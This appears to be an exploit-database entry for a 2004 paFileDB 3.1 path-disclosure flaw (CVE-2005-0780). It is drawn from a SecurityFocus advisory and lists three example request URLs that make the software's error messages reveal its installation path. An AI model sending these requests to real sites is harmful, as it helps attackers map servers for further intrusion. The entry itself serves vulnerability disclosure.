PAFileDB 3.1 - Error Message Full Path Disclosure

Author: y3dips
type: webapps
platform: php
port: 
date_added: 2004-12-04  
date_updated: 2013-03-15  
verified: 1  
codes: CVE-2005-0780;OSVDB-12264  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 24798.txt  

source: https://www.securityfocus.com/bid/11817/info

paFileDB is prone to an installation path disclosure. If invalid requests are made to certain scripts, the installation path is included in the returned error message.

http://www.example.com/pafiledb/includes/admin/admins.php
http://www.example.com/pafiledb/includes/admin/category.php
http://www.example.com/pafiledb/includes/team.php